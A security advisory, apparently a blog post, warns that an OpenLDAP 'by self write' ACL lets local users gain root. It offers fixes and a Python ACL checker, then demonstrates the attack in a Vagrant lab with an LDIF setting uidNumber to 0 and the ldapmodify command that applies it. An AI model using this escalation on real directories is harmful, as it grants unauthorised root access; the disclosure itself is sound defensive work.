Summary
Does your OpenLDAP slapd.conf contain access to * with by self write? This setting is extremely dangerous and you should revisit it right away.
What happens?
For details, see the blog post and the Vagrant setup I put on GitHub.
In short, depending on the ldap.conf and sudoers configuration, any local user who can log in can become root.
How should it be configured?
Set up the ACLs properly, keeping in mind that users can run commands such as ldapmodify. For example, grant by self write only to attributes such as userPassword, shadowLastChange, loginShell and gecos; or, conversely, first make the attributes that must not be modified read-only, and only then grant by self write.
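As an added example (not part of the original post or its Vagrant repository), the following Python checker parses slapd.conf-style access directives and flags a by self write that can reach uidNumber or gidNumber, using constructed sample ACLs: WEAK_CONF is the setting the post warns about and FIXED_CONF applies the post's advice of shielding sensitive attributes with an earlier read-only directive (slapd uses the first access directive whose target matches, so order matters). The attribute lists and regular expressions are assumptions for illustration, not a complete slapd ACL parser.

```python
import re
# Constructed samples (not the post's own config): WEAK_CONF is the ACL the post
# warns about; FIXED_CONF shields identity attributes first, as the post advises.
WEAK_CONF = """
access to *
    by self write
    by * read
"""
FIXED_CONF = """
access to attrs=uidNumber,gidNumber,uid,homeDirectory
    by * read
access to attrs=userPassword,shadowLastChange
    by self write
    by anonymous auth
    by * none
access to attrs=loginShell,gecos
    by self write
    by * read
access to *
    by self read
    by * read
"""
SELF_WRITE_OK = {"userpassword", "shadowlastchange", "loginshell", "gecos"}
SENSITIVE = {"uidnumber", "gidnumber"}  # extend as needed, e.g. memberuid

def parse_acls(conf):
    """Yield (target, [(who, level), ...]); indented lines continue a directive."""
    directives = []
    for line in conf.splitlines():
        if line[:1].isspace() and directives:
            directives[-1] += " " + line.strip()
        elif line.strip() and not line.startswith("#"):
            directives.append(line.strip())
    for d in directives:
        m = re.match(r"access\s+to\s+(.+?)\s+(by\s+.*)$", d, re.I)
        if m:
            yield m.group(1), re.findall(r"by\s+(\S+)\s+(\S+)", m.group(2), re.I)

def find_self_write_risks(conf):
    """Return targets whose 'by self write' reaches a sensitive attribute; slapd
    uses the first matching 'access to', so earlier directives shield attrs."""
    risks, shielded = [], set()
    for target, clauses in parse_acls(conf):
        m = re.search(r"attrs=(\S+)", target, re.I)
        attrs = {a.lower() for a in m.group(1).split(",")} if m else None
        if dict(clauses).get("self", "").lower() == "write":
            exposed = SENSITIVE - shielded if attrs is None else attrs - SELF_WRITE_OK
            if exposed:
                risks.append(target)
        shielded |= attrs or set()
    return risks
```

Running find_self_write_risks on WEAK_CONF reports the access to * directive, while FIXED_CONF reports nothing because uidNumber and gidNumber are already covered by the earlier read-only directive.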
Demonstration
> vagrant up
Bringing machine 'default' up with 'virtualbox' provider...
==> default: Checking if box 'hashicorp/precise32' is up to date...
==> default: Clearing any previously set forwarded ports...
==> default: Clearing any previously set network interfaces...
==> default: Preparing network interfaces based on configuration...
default: Adapter 1: nat
==> default: Forwarding ports...
default: 22 => 2222 (adapter 1)
==> default: Booting VM...
==> default: Waiting for machine to boot. This may take a few minutes...
default: SSH address: 127.0.0.1:2222
default: SSH username: vagrant
default: SSH auth method: private key
default: Warning: Connection timeout. Retrying...
==> default: Machine booted and ready!
==> default: Checking for guest additions in VM...
default: The guest additions on this VM do not match the installed version of
default: VirtualBox! In most cases this is fine, but in rare cases it can
default: prevent things such as shared folders from working properly. If you see
default: shared folder errors, please make sure the guest additions within the
default: virtual machine match the version of VirtualBox you have installed on
default: your host and reload your VM.
default:
default: Guest Additions Version: 4.2.0
default: VirtualBox Version: 4.3
==> default: Mounting shared folders...
default: /vagrant => C:/Users/kounoike/Documents/vagrant/ldap-server
default: /tmp/vagrant-chef-3/chef-solo-1/cookbooks => C:/Users/kounoike/Documents/vagrant/ldap-server/berks-cookbooks
default: /tmp/vagrant-chef-3/chef-solo-2/cookbooks => C:/Users/kounoike/Documents/vagrant/ldap-server/cookbooks
==> default: Machine already provisioned. Run `vagrant provision` or use the `--provision`
==> default: to force provisioning. Provisioners marked to run always will still run.
> vagrant ssh -- -l user1
user1@127.0.0.1's password:user1
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
167 packages can be updated.
77 updates are security updates.
New release '14.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Welcome to your Vagrant-built virtual machine.
Last login: Fri Sep 12 16:01:17 2014 from 10.0.2.2
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
167 packages can be updated.
77 updates are security updates.
New release '14.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Welcome to your Vagrant-built virtual machine.
user1@precise32:~$ id
uid=2000(user1) gid=2000(user1) groups=2000(user1)
At this point I am an ordinary user with uid=2000. Now prepare an LDIF like this:
usermod.ldif
# dn line added so ldapmodify can apply the change; it is the user's own DN, the one used to bind below
dn: uid=user1,ou=People,dc=example,dc=com
changetype: modify
replace: uidNumber
uidNumber: 0
-
replace: gidNumber
gidNumber: 0
Using this LDIF, bind as my own DN and rewrite the entry.
user1@precise32:~$ ldapmodify -D "uid=user1,ou=People,dc=example,dc=com" -w user1 -f /vagrant/usermod.ldif
Log out and log back in, and the attack is complete.
> vagrant ssh -- -l user1
user1@127.0.0.1's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
167 packages can be updated.
77 updates are security updates.
New release '14.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Welcome to your Vagrant-built virtual machine.
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
167 packages can be updated.
77 updates are security updates.
New release '14.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Welcome to your Vagrant-built virtual machine.
root@precise32:~# id
uid=0(root) gid=0(root) groups=0(root),2000(user1)